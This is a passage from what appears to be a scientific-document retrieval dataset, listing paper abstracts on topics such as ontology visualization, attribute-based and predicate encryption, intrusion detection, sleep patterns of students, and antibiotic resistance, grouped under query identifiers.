"text": "This paper presents an analysis and comparison of three existing ontology visualization tools with a new ontology visualization tool developed at the Energy Informatics Laboratory of University of Regina, Canada. The new tool is called Onto3DViz, which is designed as a knowledge engineering support tool for ontology visualization. It aims to address the deficiency that existing tools have in their lack of support for dynamic knowledge visualization. The Onto3DViz is a tool that supports a new approach of visualization in that it supports: (1) dynamic knowledge visualization; and (2) complex ontology visualization in 3-dimensional (3D) computer graphics. This paper also discusses the strengths and weaknesses of the four visualization tool when they are measured against a set of assessment criteria.",
"title": ""
},
{
"docid": "fdd33f6248bef5837ea322305d9a0549",
"text": "Visual Grounding (VG) aims to locate the most relevant object or region in an image, based on a natural language query. The query can be a phrase, a sentence or even a multi-round dialogue. There are three main challenges in VG: 1) what is the main focus in a query; 2) how to understand an image; 3) how to locate an object. Most existing methods combine all the information curtly, which may suffer from the problem of information redundancy (i.e. ambiguous query, complicated image and a large number of objects). In this paper, we formulate these challenges as three attention problems and propose an accumulated attention (A-ATT) mechanism to reason among them jointly. Our A-ATT mechanism can circularly accumulate the attention for useful information in image, query, and objects, while the noises are ignored gradually. We evaluate the performance of A-ATT on four popular datasets (namely Refer-COCO, ReferCOCO+, ReferCOCOg, and Guesswhat?!), and the experimental results show the superiority of the proposed method in term of accuracy.",
"title": ""
},
{
"docid": "2096fff6f862603ea86f51185697066f",
"text": "OBJECTIVE\nThis report provides an overview of marital and cohabiting relationships in the United States among men and women aged 15-44 in 2002, by a variety of characteristics. National estimates are provided that highlight formal and informal marital status, previous experience with marriage and cohabitation, the sequencing of marriage and cohabitation, and the stability of cohabitations and marriages.\n\n\nMETHODS\nThe analyses presented in this report are based on a nationally representative sample of 12,571 men and women aged 15-44 living in households in the United States in 2002, based on the National Survey of Family Growth, Cycle 6.\n\n\nRESULTS\nOver 40% of men and women aged 15-44 were currently married at the date of interview, compared with about 9% who were currently cohabiting. Men and women were, however, likely to cohabit prior to becoming married. Marriages were longer lasting than cohabiting unions; about 78% of marriages lasted 5 years or more, compared with less than 30% of cohabitations. Cohabitations were shorter-lived than marriages in part because about half of cohabitations transitioned to marriage within 3 years. Variations--often large variations-in marital and cohabiting relationships and durations were found by race and Hispanic origin, education, family background, and other factors.",
"title": ""
},
{
"docid": "617aca6820f774473944b9bfe822cc81",
"text": "Dental implant surgery has become routine treatment in dentistry and is generally considered to be a safe surgical procedure with a high success rate. However, complications should be taken into consideration because they can follow dental implant surgery as with any other surgical procedure. Many of the complications can be resolved without severe problems; however, in some cases, they can cause dental implant failure or even lifethreatening circumstances. Avoiding complications begins with careful treatment planning based on accurate preoperative anatomic evaluations and an understanding of all potential problems. This chapter contains surgical complications associated with dental implant surgery and management.",
"title": ""
},
{
"docid": "8405f30ca5f4bd671b056e9ca1f4d8df",
"text": "The remarkable manipulative skill of the human hand is not the result of rapid sensorimotor processes, nor of fast or powerful effector mechanisms. Rather, the secret lies in the way manual tasks are organized and controlled by the nervous system. At the heart of this organization is prediction. Successful manipulation requires the ability both to predict the motor commands required to grasp, lift, and move objects and to predict the sensory events that arise as a consequence of these commands.",
"title": ""
},
{
"docid": "cd3385566bc8ae12046122d5a32a3fb5",
"text": "Systematic reviews of literature relevant to adults with Alzheimer's disease and their families are important to the practice of occupational therapy. We describe the seven questions that served as the focus for systematic reviews of the effectiveness of occupational therapy interventions for adults with Alzheimer's disease and their families. We include the background for the reviews; the process followed for each question, including search terms and search strategy; the databases searched; and the methods used to summarize and critically appraise the literature. The final number of articles included in each systematic review; a summary of the results; the strengths and limitations of the findings; and implications for practice, education, and research are presented for the six questions addressing interventions in the areas of occupation, perception, environment, activity demands, fall prevention, and caregiver strategies.",
"title": ""
},
{
"docid": "4d8c869c9d6e1d7ba38f56a124b84412",
"text": "We propose a novel reversible jump Markov chain Monte Carlo (MCMC) simulated an nealing algorithm to optimize radial basis function (RBF) networks. This algorithm enables us to maximize the joint posterior distribution of the network parameters and the number of basis functions. It performs a global search in the joint space of the pa rameters and number of parameters, thereby surmounting the problem of local minima. We also show that by calibrating a Bayesian model, we can obtain the classical AIC, BIC and MDL model selection criteria within a penalized likelihood framework. Finally, we show theoretically and empirically that the algorithm converges to the modes of the full posterior distribution in an efficient way.",
"title": ""
},
{
"docid": "aab0902392cd011893bc7d2ad76e9220",
"text": "We discuss several uses of blockchain (and, more generally, distributed ledger) technologies outside of cryptocurrencies with a pragmatic view. We mostly focus on three areas: the role of coin economies for what we refer to as data malls (specialized data marketplaces); data provenance (a historical record of data and its origins); and what we term keyless payments (made without having to know other users’ cryptographic keys). We also discuss voting and other areas, and give a sizable list of academic and nonacademic references.",
"title": ""
},
{
"docid": "c7e75d6abd8065d20da39b264a510c83",
"text": "OBJECTIVE\nThe authors' purpose in this study was to determine the sleep patterns of college students to identify problem areas and potential solutions.\n\n\nPARTICIPANTS\nA total of 313 students returned completed surveys.\n\n\nMETHODS\nA sleep survey was e-mailed to a random sample of students at a North Central university. Questions included individual sleep patterns, problems, and possible influencing factors.\n\n\nRESULTS\nMost students reported later bedtimes and rise times on weekends than they did on weekdays. More than 33% of the students took longer than 30 minutes to fall asleep, and 43% woke more than once nightly. More than 33% reported being tired during the day. The authors found no differences between freshmen, sophomores, juniors, seniors, and graduate students for time to fall asleep, number of night wakings, or total time slept each night.\n\n\nCONCLUSIONS\nMany students have sleep problems that may interfere with daily performance, such as driving and academics. Circadian rhythm management, sleep hygiene, and white noise could ameliorate sleep difficulties.",
"title": ""
},
{
"docid": "d3e561a6ac610d84921664662b57ed33",
"text": "Antibiotic resistance is ancient and widespread in environmental bacteria. These are therefore reservoirs of resistance elements and reflective of the natural history of antibiotics and resistance. In a previous study, we discovered that multi-drug resistance is common in bacteria isolated from Lechuguilla Cave, an underground ecosystem that has been isolated from the surface for over 4 Myr. Here we use whole-genome sequencing, functional genomics and biochemical assays to reveal the intrinsic resistome of Paenibacillus sp. LC231, a cave bacterial isolate that is resistant to most clinically used antibiotics. We systematically link resistance phenotype to genotype and in doing so, identify 18 chromosomal resistance elements, including five determinants without characterized homologues and three mechanisms not previously shown to be involved in antibiotic resistance. A resistome comparison across related surface Paenibacillus affirms the conservation of resistance over millions of years and establishes the longevity of these genes in this genus.",
"title": ""
}
] | scidocsrr |
53c8c26f761c6e2259cebfecda1502d1 | New Constructions and Proof Methods for Large Universe Attribute-Based Encryption | [
{
"docid": "1600d4662fc5939c5f737756e2d3e823",
"text": "Predicate encryption is a new paradigm for public-key encryption that generalizes identity-based encryption and more. In predicate encryption, secret keys correspond to predicates and ciphertexts are associated with attributes; the secret key SK f corresponding to a predicate f can be used to decrypt a ciphertext associated with attribute I if and only if f(I)=1. Constructions of such schemes are currently known only for certain classes of predicates. We construct a scheme for predicates corresponding to the evaluation of inner products over ℤ N (for some large integer N). This, in turn, enables constructions in which predicates correspond to the evaluation of disjunctions, polynomials, CNF/DNF formulas, thresholds, and more. Besides serving as a significant step forward in the theory of predicate encryption, our results lead to a number of applications that are interesting in their own right.",
"title": ""
}
] | [
{
"docid": "9001f640ae3340586f809ab801f78ec0",
"text": "A correct perception of road signalizations is required for autonomous cars to follow the traffic codes. Road marking is a signalization present on road surfaces and commonly used to inform the correct lane cars must keep. Cameras have been widely used for road marking detection, however they are sensible to environment illumination. Some LIDAR sensors return infrared reflective intensity information which is insensible to illumination condition. Existing road marking detectors that analyzes reflective intensity data focus only on lane markings and ignores other types of signalization. We propose a road marking detector based on Otsu thresholding method that make possible segment LIDAR point clouds into asphalt and road marking. The results show the possibility of detecting any road marking (crosswalks, continuous lines, dashed lines). The road marking detector has also been integrated with Monte Carlo localization method so that its performance could be validated. According to the results, adding road markings onto curb maps lead to a lateral localization error of 0.3119 m.",
"title": ""
},
{
"docid": "98571cb7f32b389683e8a9e70bd87339",
"text": "We identify two issues with the family of algorithms based on the Adversarial Imitation Learning framework. The first problem is implicit bias present in the reward functions used in these algorithms. While these biases might work well for some environments, they can also lead to sub-optimal behavior in others. Secondly, even though these algorithms can learn from few expert demonstrations, they require a prohibitively large number of interactions with the environment in order to imitate the expert for many real-world applications. In order to address these issues, we propose a new algorithm called Discriminator-Actor-Critic that uses off-policy Reinforcement Learning to reduce policy-environment interaction sample complexity by an average factor of 10. Furthermore, since our reward function is designed to be unbiased, we can apply our algorithm to many problems without making any task-specific adjustments.",
"title": ""
},
{
"docid": "2b1caf45164e7453453eaaf006dc3827",
"text": "This paper presents an estimation of the longitudinal movement of an aircraft using the STM32 microcontroller F1 Family. The focus of this paper is on developing code to implement the famous Luenberger Observer and using the different devices existing in STM32 F1 micro-controllers. The suggested Luenberger observer was achieved using the Keil development tools designed for devices microcontrollers based on the ARM processor and labor with C / C ++ language. The Characteristics that show variations in time of the state variables and step responses prove that the identification of the longitudinal movement of an aircraft were performed with minor errors in the right conditions. These results lead to easily develop predictive algorithms for programmable hardware in the industry.",
"title": ""
},
{
"docid": "7ecfea8abc9ba29719cdd4bf02e99d5d",
"text": "The literature shows an increase in blended learning implementations (N = 74) at faculties of education in Turkey whereas pre-service and in-service teachers’ ICT competencies have been identified as one of the areas where they are in need of professional development. This systematic review was conducted to find out the impact of blended learning on academic achievement and attitudes at teacher education programs in Turkey. 21 articles and 10 theses complying with all pre-determined criteria (i.e., studies having quantitative research design or at least a quantitative aspect conducted at pre-service teacher education programs) included within the scope of this review. With regard to academic achievement, it was synthesized that majority of the studies confirmed its positive impact on attaining course outcomes. Likewise, blended learning environment was revealed to contribute pre-service teachers to develop positive attitudes towards the courses. It was also concluded that face-to-face aspect of the courses was favoured considerably as it enhanced social interaction between peers and teachers. Other benefits of blended learning were listed as providing various materials, receiving prompt feedback, and tracking progress. Slow internet access, connection failure and anxiety in some pre-service teachers on using ICT were reported as obstacles. Regarding the positive results of blended learning and the significance of ICT integration, pre-service teacher education curricula are suggested to be reconstructed by infusing ICT into entire program through blended learning rather than delivering isolated ICT courses which may thus serve for prospective teachers as catalysts to integrate the use of ICT in their own teaching.",
"title": ""
},
{
"docid": "842a1d2da67d614ecbc8470987ae85e9",
"text": "The task of recovering three-dimensional (3-D) geometry from two-dimensional views of a scene is called 3-D reconstruction. It is an extremely active research area in computer vision. There is a large body of 3-D reconstruction algorithms available in the literature. These algorithms are often designed to provide different tradeoffs between speed, accuracy, and practicality. In addition, even the output of various algorithms can be quite different. For example, some algorithms only produce a sparse 3-D reconstruction while others are able to output a dense reconstruction. The selection of the appropriate 3-D reconstruction algorithm relies heavily on the intended application as well as the available resources. The goal of this paper is to review some of the commonly used motion-parallax-based 3-D reconstruction techniques and make clear the assumptions under which they are designed. To do so efficiently, we classify the reviewed reconstruction algorithms into two large categories depending on whether a prior calibration of the camera is required. Under each category, related algorithms are further grouped according to the common properties they share.",
"title": ""
},
{
"docid": "ec40606c46cc1bd3e1d4c64793a8ca83",
"text": "Thin-layer chromatography (TLC) and liquid chromatography (LC) methods were developed for the qualitative and quantitative determination of agrimoniin, pedunculagin, ellagic acid, gallic acid, and catechin in selected herbal medicinal products from Rosaceae: Anserinae herba, Tormentillae rhizoma, Alchemillae herba, Agrimoniae herba, and Fragariae folium. Unmodified silica gel (TLC Si60, HPTLC LiChrospher Si60) and silica gel chemically modified with octadecyl or aminopropyl groups (HPTLC RP18W and HPTLC NH2) were used for TLC. The best resolution and selectivity were achieved with the following mobile phases: diisopropyl ether-acetone-formic acid-water (40 + 30 + 20 + 10, v/v/v/v), tetrahydrofuran-acetonitrile-water (30 + 10 + 60, v/v/v), and acetone-formic acid (60 + 40, v/v). Concentrations of the studied herbal drugs were determined by using a Chromolith Performance RP-18e column with acetonitrile-water-formic acid as the mobile phase. Determinations of linearity, range, detection and quantitation limits, accuracy, precision, and robustness showed that the HPLC method was sufficiently precise for estimation of the tannins and related polyphenols mentioned above. Investigations of suitable solvent selection, sample extraction procedure, and short-time stability of analytes at storage temperatures of 4 and 20 degrees C were also performed. The percentage of agrimoniin in pharmaceutical products was between 0.57 and 3.23%.",
"title": ""
},
{
"docid": "de67aeb2530695bcc6453791a5fa8c77",
"text": "Sebaceous carcinoma is a rare adenocarcinoma with variable degrees of sebaceous differentiation, most commonly found on periocular skin, but also occasionally occur extraocular. It can occur in isolation or as part of the MuirTorre syndrome. Sebaceous carcinomas are yellow or red nodules or plaques often with a friable surface, ulceration, or crusting. On histological examination, sebaceous carcinomas are typically poorly circumscribed, asymmetric, and infiltrative. Individual cells are pleomorphic with atypical nuclei, mitoses, and a coarsely vacuolated cytoplasm.",
"title": ""
},
{
"docid": "374b87b187fbc253477cd1e8f60e9d91",
"text": "Term Used Definition Provided Source I/T strategy None provided Henderson and Venkatraman 1999 Information Management Strategy \" A long-term precept for directing, implementing and supervising information management \" (information management left undefined) Reponen 1994 (p. 30) \" Deals with management of the entire information systems function, \" referring to Earl (1989, p. 117): \" the management framework which guides how the organization should run IS/IT activities \" Ragu-Nathan et al. 2001 (p. 269)",
"title": ""
},
{
"docid": "5a08b007fbe1a424f9788ea68ec47d80",
"text": "We introduce a novel ensemble model based on random projections. The contribution of using random projections is two-fold. First, the randomness provides the diversity which is required for the construction of an ensemble model. Second, random projections embed the original set into a space of lower dimension while preserving the dataset’s geometrical structure to a given distortion. This reduces the computational complexity of the model construction as well as the complexity of the classification. Furthermore, dimensionality reduction removes noisy features from the data and also represents the information which is inherent in the raw data by using a small number of features. The noise removal increases the accuracy of the classifier. The proposed scheme was tested using WEKA based procedures that were applied to 16 benchmark dataset from the UCI repository.",
"title": ""
},
{
"docid": "f03a96d81f7eeaf8b9befa73c2b6fbd5",
"text": "This research provided the first empirical investigation of how approach and avoidance motives for sacrifice in intimate relationships are associated with personal well-being and relationship quality. In Study 1, the nature of everyday sacrifices made by dating partners was examined, and a measure of approach and avoidance motives for sacrifice was developed. In Study 2, which was a 2-week daily experience study of college students in dating relationships, specific predictions from the theoretical model were tested and both longitudinal and dyadic components were included. Whereas approach motives for sacrifice were positively associated with personal well-being and relationship quality, avoidance motives for sacrifice were negatively associated with personal well-being and relationship quality. Sacrificing for avoidance motives was particularly detrimental to the maintenance of relationships over time. Perceptions of a partner's motives for sacrifice were also associated with well-being and relationship quality. Implications for the conceptualization of relationship maintenance processes along these 2 dimensions are discussed.",
"title": ""
},
{
"docid": "e389bed063035d3e9160d3136d2729a0",
"text": "We introduce and construct timed commitment schemes, an extension to the standard notion of commitments in which a potential forced opening phase permits the receiver to recover (with effort) the committed value without the help of the committer. An important application of our timed-commitment scheme is contract signing: two mutually suspicious parties wish to exchange signatures on a contract. We show a two-party protocol that allows them to exchange RSA or Rabin signatures. The protocol is strongly fair: if one party quits the protocol early, then the two parties must invest comparable amounts of time to retrieve the signatures. This statement holds even if one party has many more machines than the other. Other applications, including honesty preserving auctions and collective coin-flipping, are discussed.",
"title": ""
},
{
"docid": "c955e63d5c5a30e18c008dcc51d1194b",
"text": "We report, for the first time, the identification of fatty acid particles in formulations containing the surfactant polysorbate 20. These fatty acid particles were observed in multiple mAb formulations during their expected shelf life under recommended storage conditions. The fatty acid particles were granular or sand-like in morphology and were several microns in size. They could be identified by distinct IR bands, with additional confirmation from energy-dispersive X-ray spectroscopy analysis. The particles were readily distinguishable from protein particles by these methods. In addition, particles containing a mixture of protein and fatty acids were also identified, suggesting that the particulation pathways for the two particle types may not be distinct. The techniques and observations described will be useful for the correct identification of proteinaceous versus nonproteinaceous particles in pharmaceutical products.",
"title": ""
},
{
"docid": "760a02c6205b2e2e38d14fa91708c508",
"text": "The popular h-index used to measure scientific output can be described in terms of a pool of evaluated objects (the papers), a quality function on the evaluated objects (the number of citations received by each paper) and a sentencing line crossing the origin, whose intersection with the graph of the quality function yields the index value (in the h-index this is a line with slope 1). Based on this abstraction, we present a new index, the c-index, in which the evaluated objects are the citations received by an author, a group of authors, a journal, etc., the quality function of a citation is the collaboration distance between the authors of the cited and the citing papers, and the sentencing line can take slopes between 0 and ∞. As a result, the new index counts only those citations which are significant enough, where significance is proportional to collaboration distance. Several advantages of the new c-index with respect to previous proposals are discussed.",
"title": ""
},
{
"docid": "4ceab082d195c1f69bb98793852f4a29",
"text": "This paper presents a 22 to 26.5 Gb/s optical receiver with an all-digital clock and data recovery (AD-CDR) fabricated in a 65 nm CMOS process. The receiver consists of an optical front-end and a half-rate bang-bang clock and data recovery circuit. The optical front-end achieves low power consumption by using inverter-based amplifiers and realizes sufficient bandwidth by applying several bandwidth extension techniques. In addition, in order to minimize additional jitter at the front-end, not only magnitude and bandwidth but also group-delay responses are considered. The AD-CDR employs an LC quadrature digitally controlled oscillator (LC-QDCO) to achieve a high phase noise figure-of-merit at tens of gigahertz. The recovered clock jitter is 1.28 ps rms and the measured jitter tolerance exceeds the tolerance mask specified in IEEE 802.3ba. The receiver sensitivity is 106 and 184 for a bit error rate of 10-12 at data rates of 25 and 26.5 Gb/s, respectively. The entire receiver chip occupies an active die area of 0.75 mm2 and consumes 254 mW at a data rate of 26.5 Gb/s. The energy efficiencies of the front-end and entire receiver at 26.5 Gb/s are 1.35 and 9.58 pJ/bit, respectively.",
"title": ""
},
{
"docid": "4df5ae1f7eae0c366bd5bdb30af80ad2",
"text": "Robots inevitably fail, often without the ability to recover autonomously. We demonstrate an approach for enabling a robot to recover from failures by communicating its need for specific help to a human partner using natural language. Our approach automatically detects failures, then generates targeted spoken-language requests for help such as “Please give me the white table leg that is on the black table.” Once the human partner has repaired the failure condition, the system resumes full autonomy. We present a novel inverse semantics algorithm for generating effective help requests. In contrast to forward semantic models that interpret natural language in terms of robot actions and perception, our inverse semantics algorithm generates requests by emulating the human’s ability to interpret a request using the Generalized Grounding Graph (G) framework. To assess the effectiveness of our approach, we present a corpusbased online evaluation, as well as an end-to-end user study, demonstrating that our approach increases the effectiveness of human interventions compared to static requests for help.",
"title": ""
},
{
"docid": "c2dfa94555085b6ca3b752d719688613",
"text": "In this paper, we propose RNN-Capsule, a capsule model based on Recurrent Neural Network (RNN) for sentiment analysis. For a given problem, one capsule is built for each sentiment category e.g., ‘positive’ and ‘negative’. Each capsule has an attribute, a state, and three modules: representation module, probability module, and reconstruction module. The attribute of a capsule is the assigned sentiment category. Given an instance encoded in hidden vectors by a typical RNN, the representation module builds capsule representation by the attention mechanism. Based on capsule representation, the probability module computes the capsule’s state probability. A capsule’s state is active if its state probability is the largest among all capsules for the given instance, and inactive otherwise. On two benchmark datasets (i.e., Movie Review and Stanford Sentiment Treebank) and one proprietary dataset (i.e., Hospital Feedback), we show that RNN-Capsule achieves state-of-the-art performance on sentiment classification. More importantly, without using any linguistic knowledge, RNN-Capsule is capable of outputting words with sentiment tendencies reflecting capsules’ attributes. The words well reflect the domain specificity of the dataset. ACM Reference Format: Yequan Wang1 Aixin Sun2 Jialong Han3 Ying Liu4 Xiaoyan Zhu1. 2018. Sentiment Analysis by Capsules. InWWW 2018: The 2018 Web Conference, April 23–27, 2018, Lyon, France. ACM, New York, NY, USA, 10 pages. https://doi.org/10.1145/3178876.3186015",
"title": ""
},
{
"docid": "a75d3395a1d4859b465ccbed8647fbfe",
"text": "PURPOSE\nThe influence of a core-strengthening program on low back pain (LBP) occurrence and hip strength differences were studied in NCAA Division I collegiate athletes.\n\n\nMETHODS\nIn 1998, 1999, and 2000, hip strength was measured during preparticipation physical examinations and occurrence of LBP was monitored throughout the year. Following the 1999-2000 preparticipation physicals, all athletes began participation in a structured core-strengthening program, which emphasized abdominal, paraspinal, and hip extensor strengthening. Incidence of LBP and the relationship with hip muscle imbalance were compared between consecutive academic years.\n\n\nRESULTS\nAfter incorporation of core strengthening, there was no statistically significant change in LBP occurrence. Side-to-side extensor strength between athletes participating in both the 1998-1999 and 1999-2000 physicals were no different. After core strengthening, the right hip extensor was, on average, stronger than that of the left hip extensor (P = 0.0001). More specific gender differences were noted after core strengthening. Using logistic regression, female athletes with weaker left hip abductors had a more significant probability of requiring treatment for LBP (P = 0.009)\n\n\nCONCLUSION\nThe impact of core strengthening on collegiate athletes has not been previously examined. These results indicated no significant advantage of core strengthening in reducing LBP occurrence, though this may be more a reflection of the small numbers of subjects who actually required treatment. The core program, however, seems to have had a role in modifying hip extensor strength balance. The association between hip strength and future LBP occurrence, observed only in females, may indicate the need for more gender-specific core programs. The need for a larger scale study to examine the impact of core strengthening in collegiate athletes is demonstrated.",
"title": ""
},
{
"docid": "d5666bfb1fcd82ac89da2cb893ba9fb7",
"text": "Ad-servers have to satisfy many different targeting criteria, and the combination can often result in no feasible solution. We hypothesize that advertisers may be defining these metrics to create a kind of \"proxy target\". We therefore reformulate the standard ad-serving problem to one where we attempt to get as close as possible to the advertiser's multi-dimensional target inclusive of delivery. We use a simple simulation to illustrate the behavior of this algorithm compared to Constraint and Pacing strategies. The system is then deployed in one of the largest video ad-servers in the United States and we show experimental results from live test ads, as well as 6 months of production performance across hundreds of ads. We find that the live ad-server tests match the simulation, and we report significant gains in multi-KPI performance from using the error minimization strategy.",
"title": ""
},
{
"docid": "e668eddaa2cec83540a992e09e0be368",
"text": "The increasing number of attacks on internet-based systems calls for security measures on behalf those systems’ operators. Beside classical methods and tools for penetration testing, there exist additional approaches using publicly available search engines. We present an alternative approach using contactless vulnerability analysis with both classical and subject-specific search engines. Based on an extension and combination of their functionality, this approach provides a method for obtaining promising results for audits of IT systems, both quantitatively and qualitatively. We evaluate our approach and confirm its suitability for a timely determination of vulnerabilities in large-scale networks. In addition, the approach can also be used to perform vulnerability analyses of network areas or domains in unclear legal situations.",
"title": ""
},
{
"docid": "f3fc221d2d57163f43f165400b9eee02",
"text": "Article history: Received 13 March 2017 Received in revised form 19 June 2017 Accepted 4 July 2017 Available online xxxx",
"title": ""
}
] | scidocsrr |
a10ec8373a777cf959c5f0812920f46f | On Validity of Program Transformations in the Java Memory Model | [
{
"docid": "b9a14bea9bb5af017ab325efe76bae84",
"text": "A semantics to a small fragment of Java capturing the new memory model (JMM) described in the Language Specification is given by combining operational, denotational and axiomatic techniques in a novel semantic framework. The operational steps (specified in the form of SOS) construct denotational models (configuration structures) and are constrained by the axioms of a configuration theory. The semantics is proven correct with respect to the Language Specification and shown to capture many common examples in the JMM literature.",
"title": ""
}
] | [
{
"docid": "8ac6160d8e6f7d425e2b2416626e5c2d",
"text": "This report presents a concept design for the algorithms part of the STL and outlines the design of the supporting language mechanism. Both are radical simplifications of what was proposed in the C++0x draft. In particular, this design consists of only 41 concepts (including supporting concepts), does not require concept maps, and (perhaps most importantly) does not resemble template metaprogramming.",
"title": ""
},
{
"docid": "80f79899a8a049a3cb66c045a6d2f902",
"text": "BACKGROUND\nUnderstanding the factors regulating our microbiota is important but requires appropriate statistical methodology. When comparing two or more populations most existing approaches either discount the underlying compositional structure in the microbiome data or use probability models such as the multinomial and Dirichlet-multinomial distributions, which may impose a correlation structure not suitable for microbiome data.\n\n\nOBJECTIVE\nTo develop a methodology that accounts for compositional constraints to reduce false discoveries in detecting differentially abundant taxa at an ecosystem level, while maintaining high statistical power.\n\n\nMETHODS\nWe introduced a novel statistical framework called analysis of composition of microbiomes (ANCOM). ANCOM accounts for the underlying structure in the data and can be used for comparing the composition of microbiomes in two or more populations. ANCOM makes no distributional assumptions and can be implemented in a linear model framework to adjust for covariates as well as model longitudinal data. ANCOM also scales well to compare samples involving thousands of taxa.\n\n\nRESULTS\nWe compared the performance of ANCOM to the standard t-test and a recently published methodology called Zero Inflated Gaussian (ZIG) methodology (1) for drawing inferences on the mean taxa abundance in two or more populations. ANCOM controlled the false discovery rate (FDR) at the desired nominal level while also improving power, whereas the t-test and ZIG had inflated FDRs, in some instances as high as 68% for the t-test and 60% for ZIG. We illustrate the performance of ANCOM using two publicly available microbial datasets in the human gut, demonstrating its general applicability to testing hypotheses about compositional differences in microbial communities.\n\n\nCONCLUSION\nAccounting for compositionality using log-ratio analysis results in significantly improved inference in microbiota survey data.",
"title": ""
},
{
"docid": "189cc09c72686ae7282eef04c1b365f1",
"text": "With the rapid growth of the internet as well as increasingly more accessible mobile devices, the amount of information being generated each day is enormous. We have many popular websites such as Yelp, TripAdvisor, Grubhub etc. that offer user ratings and reviews for different restaurants in the world. In most cases, though, the user is just interested in a small subset of the available information, enough to get a general overview of the restaurant and its popular dishes. In this paper, we present a way to mine user reviews to suggest popular dishes for each restaurant. Specifically, we propose a method that extracts and categorize dishes from Yelp restaurant reviews, and then ranks them to recommend the most popular dishes.",
"title": ""
},
{
"docid": "5d1b66986357f2566ac503727a80bb87",
"text": "Natural Language Inference (NLI) task requires an agent to determine the logical relationship between a natural language premise and a natural language hypothesis. We introduce Interactive Inference Network (IIN), a novel class of neural network architectures that is able to achieve high-level understanding of the sentence pair by hierarchically extracting semantic features from interaction space. We show that an interaction tensor (attention weight) contains semantic information to solve natural language inference, and a denser interaction tensor contains richer semantic information. One instance of such architecture, Densely Interactive Inference Network (DIIN), demonstrates the state-of-the-art performance on large scale NLI copora and large-scale NLI alike corpus. It’s noteworthy that DIIN achieve a greater than 20% error reduction on the challenging Multi-Genre NLI (MultiNLI; Williams et al. 2017) dataset with respect to the strongest published system.",
"title": ""
},
{
"docid": "1844a5877f911ecaf932282e5a67b727",
"text": "Many online social network (OSN) users are unaware of the numerous security risks that exist in these networks, including privacy violations, identity theft, and sexual harassment, just to name a few. According to recent studies, OSN users readily expose personal and private details about themselves, such as relationship status, date of birth, school name, email address, phone number, and even home address. This information, if put into the wrong hands, can be used to harm users both in the virtual world and in the real world. These risks become even more severe when the users are children. In this paper, we present a thorough review of the different security and privacy risks, which threaten the well-being of OSN users in general, and children in particular. In addition, we present an overview of existing solutions that can provide better protection, security, and privacy for OSN users. We also offer simple-to-implement recommendations for OSN users, which can improve their security and privacy when using these platforms. Furthermore, we suggest future research directions.",
"title": ""
},
{
"docid": "6dbaeff4f3cb814a47e8dc94c4660d33",
"text": "An Intrusion Detection System (IDS) is a software that monitors a single or a network of computers for malicious activities (attacks) that are aimed at stealing or censoring information or corrupting network protocols. Most techniques used in today’s IDS are not able to deal with the dynamic and complex nature of cyber attacks on computer networks. Hence, efficient adaptive methods like various techniques of machine learning can result in higher detection rates, lower false alarm rates and reasonable computation and communication costs. In this paper, we study several such schemes and compare their performance. We divide the schemes into methods based on classical artificial intelligence (AI) and methods based on computational intelligence (CI). We explain how various characteristics of CI techniques can be used to build efficient IDS.",
"title": ""
},
{
"docid": "dd6b50a56b740d07f3d02139d16eeec4",
"text": "Mitochondria play a central role in the aging process. Studies in model organisms have started to integrate mitochondrial effects on aging with the maintenance of protein homeostasis. These findings center on the mitochondrial unfolded protein response (UPR(mt)), which has been implicated in lifespan extension in worms, flies, and mice, suggesting a conserved role in the long-term maintenance of cellular homeostasis. Here, we review current knowledge of the UPR(mt) and discuss its integration with cellular pathways known to regulate lifespan. We highlight how insight into the UPR(mt) is revolutionizing our understanding of mitochondrial lifespan extension and of the aging process.",
"title": ""
},
{
"docid": "5c690df3977b078243b9cb61e5e712a6",
"text": "Computing indirect illumination is a challenging and complex problem for real-time rendering in 3D applications. We present a global illumination approach that computes indirect lighting in real time using a simplified version of the outgoing radiance and the scene stored in voxels. This approach comprehends two-bounce indirect lighting for diffuse, specular and emissive materials. Our voxel structure is based on a directional hierarchical structure stored in 3D textures with mipmapping, the structure is updated in real time utilizing the GPU which enables us to approximate indirect lighting for dynamic scenes. Our algorithm employs a voxel-light pass which calculates voxel direct and global illumination for the simplified outgoing radiance. We perform voxel cone tracing within this voxel structure to approximate different lighting phenomena such as ambient occlusion, soft shadows and indirect lighting. We demonstrate with different tests that our developed approach is capable to compute global illumination of complex scenes on interactive times.",
"title": ""
},
{
"docid": "a92ec968ed54217126dc84660a6602b5",
"text": "In the wake of new forms of curricular policy in many parts of the world, teachers are increasingly required to act as agents of change. And yet, teacher agency is under-theorised and often misconstrued in the educational change literature, wherein agency and change are seen as synonymous and positive. This paper addresses the issue of teacher agency in the context of an empirical study of curriculum making in schooling. Drawing upon the existing literature, we outline an ecological view of agency as an effect. These insights frame the analysis of a set of empirical data, derived from a research project about curriculum-making in a school and further education college in Scotland. Based upon the evidence, we argue that the extent to which teachers are able to achieve agency varies from context to context based upon certain environmental conditions of possibility and constraint, and that an important factor in this lies in the beliefs, values and attributes that teachers mobilise in relation to particular situations.",
"title": ""
},
{
"docid": "dbdbdf3df12ef47c778e0e9f4ddfc7d6",
"text": "In the recent years, research on speech recognition has given much diligence to the automatic transcription of speech data such as broadcast news (BN), medical transcription, etc. Large Vocabulary Continuous Speech Recognition (LVCSR) systems have been developed successfully for Englishes (American English (AE), British English (BE), etc.) and other languages but in case of Indian English (IE), it is still at infancy stage. IE is one of the varieties of English spoken in Indian subcontinent and is largely different from the English spoken in other parts of the world. In this paper, we have presented our work on LVCSR of IE video lectures. The speech data contains video lectures on various engineering subjects given by the experts from all over India as part of the NPTEL project which comprises of 23 hours. We have used CMU Sphinx for training and decoding in our large vocabulary continuous speech recognition experiments. The results analysis instantiate that building IE acoustic model for IE speech recognition is essential due to the fact that it has given 34% less average word error rate (WER) than HUB-4 acoustic models. The average WER before and after adaptation of IE acoustic model is 38% and 31% respectively. Even though, our IE acoustic model is trained with limited training data and the corpora used for building the language models do not mimic the spoken language, the results are promising and comparable to the results reported for AE lecture recognition in the literature.",
"title": ""
},
{
"docid": "ea8a7678dc2b0059ed491cb311f71c52",
